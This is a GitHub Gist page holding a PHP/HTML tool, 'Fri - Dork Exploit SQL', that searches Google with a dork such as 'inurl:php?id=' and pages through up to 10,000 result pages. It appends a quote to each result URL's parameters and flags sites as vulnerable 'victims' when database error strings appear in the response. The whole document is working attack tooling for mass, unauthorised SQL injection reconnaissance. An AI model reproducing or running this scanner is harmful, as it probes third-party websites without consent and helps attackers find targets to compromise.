Last active
July 12, 2016 05:24
-
-
Save MesterFri/d63d7f1cc2d1935dcc4fc67acf69eb63 to your computer and use it in GitHub Desktop.
Script Scanner dork SQLi >> Exploit by MesterFri
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- | |
############## | |
# MesterFri # | |
############## | |
//--> | |
<?php | |
set_time_limit(0); | |
ini_set('memory_limit', '64M'); | |
header('Content-Type: text/html; charset=UTF-8'); | |
/* Errors Dork*/ | |
$error[] = 'You have an error in your SQL'; | |
$error[] = 'supplied argument is not a valid MySQL result resource in'; | |
$error[] = 'Division by zero in'; | |
$error[] = 'Call to a member function'; | |
$error[] = 'Microsoft JET Database'; | |
$error[] = 'ODBC Microsoft Access Driver'; | |
$error[] = 'Microsoft OLE DB Provider for SQL Server'; | |
$error[] = 'Unclosed quotation mark'; | |
$error[] = 'Microsoft OLE DB Provider for Oracle'; | |
$error[] = 'Incorrect syntax near'; | |
$error[] = 'SQL query failed'; | |
$error[] = 'Warning mysql_fetch_assoc()'; | |
$error[] = 'Warning mysql_fetch_array()'; | |
$error[] = 'Warning session_start()'; | |
$error[] = 'Warning getimagesize()'; | |
$error[] = 'Warning is_writable()'; | |
$error[] = 'Warning getimagesize()'; | |
$error[] = 'Warning Unknown()'; | |
$error[] = 'Warning mysql_result()'; | |
$error[] = 'Warning pg_exec()'; | |
$error[] = 'Warning mysql_result()'; | |
$error[] = 'Warning mysql_num_rows()'; | |
$error[] = 'Warning mysql_query()'; | |
$error[] = 'Warning array_merge()'; | |
$error[] = 'Warning preg_match()'; | |
$error[] = 'Warning filesize()'; | |
$error[] = 'Warning require()'; | |
function letItBy(){ ob_flush(); flush(); } | |
function google_that($query, $page=1){ | |
$resultPerPage=8; //max result per page is 8 (GOOGLE rules) | |
$start = $page*$resultPerPage; | |
$url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query); | |
/* Get result */ | |
$resultFromGoogle = json_decode( http_get($url, true) ,true); | |
/* Check result */ | |
if(isset($resultFromGoogle['responseStatus'])){ | |
/* Check response status */ | |
if($resultFromGoogle['responseStatus'] != '200') return false; //die( 'The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $resultFromGoogle['responseDetails'] . '<br>' .$url ); | |
/* Count results */ | |
if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false; //if no results return false | |
else return $resultFromGoogle['responseData']['results']; //return the results | |
} | |
/* | |
if this function kill the script, go to --> http://code.google.com/intl/iw/apis/websearch/docs/ AND LEARN!! | |
*/ | |
else | |
die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url ); | |
} | |
function http_get($url, $safemode = false){ | |
if($safemode === true) sleep(1); // safe mode, i dont want GOOGLE ban me.. | |
$im = curl_init($url); | |
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); | |
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); | |
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); | |
curl_setopt($im, CURLOPT_HEADER, 0); | |
return curl_exec($im); | |
curl_close(); | |
} | |
function check_injection($url){ | |
$data = http_get( str_replace("=", "='", $url) ); | |
$errors = implode("|", $GLOBALS['error']); | |
return preg_match("#{$errors}#i", $data); | |
} | |
?> | |
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta name="Content-Type" content="text/html; charset=UTF-8"> | |
<title>SQL Exploit</title> | |
<style type="text/css"> | |
body{ background-color:black ; font: normal 5px Times New Roman; color:red;} | |
input{ border-width:5px; padding:8px; width:300px; } | |
a{ text-decoration:none; color:black;} | |
#button{ width:63px;} | |
#result{margin:20px;} | |
#result span{display:block;} | |
#result .Y{background-color:blue;} | |
#result .X{background-color:;} | |
</style> | |
</head> | |
<body> | |
<style> | |
body{ | |
font-family: "Times New Roman", cursive; | |
background-color: #000000; | |
text-shadow:0px 0px 1px #FF0000; | |
} | |
table{ | |
border: 1px #FF0000; | |
} | |
input,select,textarea{ | |
border: 1px #00ff00 solid; | |
-moz-border-radius: 5px; | |
-webkit-border-radius:5px; | |
border-radius:5px; | |
} | |
</style> | |
<center><h1><font color="Lime" face="Times New Roman" size="+4">F</font><font color="Lime" face="Times New Roman" size="+2">ri </font><font color="Lime" face="Times New Roman" size="+4"> - D</font><font color="Lime" face="Times New Roman" size="+2">ork </font><font color="lime" face="Times New Roman" size="+4">E</font><font color="lime" face="Times New Roman" size="+2">xploit</font><font color="blue" face="Times New Roman" size="+4"> SQL</font><br><br> | |
<center> <form method="post"> | |
<slect onchange="document.getElementById('dork').value=this.options[this.selectedIndex].text;"><!-- developed by Afla-Youssef Don't remove Copyright pleass --> | |
<input type="text" id="dork" name="dork" style="background-color: black; color: red; font-size: 15px; font-family: courier new;" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:php?id='; ?>" /> | |
<br> | |
<input type="submit" value="Start" id="button" style="background-color: black; color: blue; font-size: 15px; font-family:Times New Roman;" onclick="show_alert();"/> | |
<script> | |
function show_alert() | |
{ | |
alert(" Exploit Dork Start ^_^"); | |
} | |
</script> | |
</form></center> | |
<?php | |
if(isset($_POST['dork']{0})){ | |
echo '<div id="result"><center> Search... MesterFri</center><br>'; | |
letItBy(); | |
for($googlePage = 1; $googlePage <= 10000; $googlePage++){ | |
$googleResult = google_that($_POST['dork'], $googlePage); | |
if(!$googleResult){ | |
echo '<center>google dont heve more result, so I done..(?)</center>'; | |
break; | |
} | |
for($victim = 0; $victim < sizeof($googleResult); $victim++){ | |
if(check_injection($googleResult[$victim]['unescapedUrl'])){ | |
echo '<span class="Y">'; | |
// file_put_contents("log.txt", "{$googleResult[$victim]['unescapedUrl']}\n"); | |
} | |
else echo '<span class="X">'; | |
echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a></span>\n"; | |
letItBy(); | |
} | |
} | |
echo '</div>'; | |
} | |
?> | |
<center><font color="blue" face="Times New Roman" size="+2">M</font><font color="blue" face="Times New Roman">ester</font><font color="blue" face="Times New Roman" size="+2">F</font><font color="blue" face="Times New Roman">ri</font> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment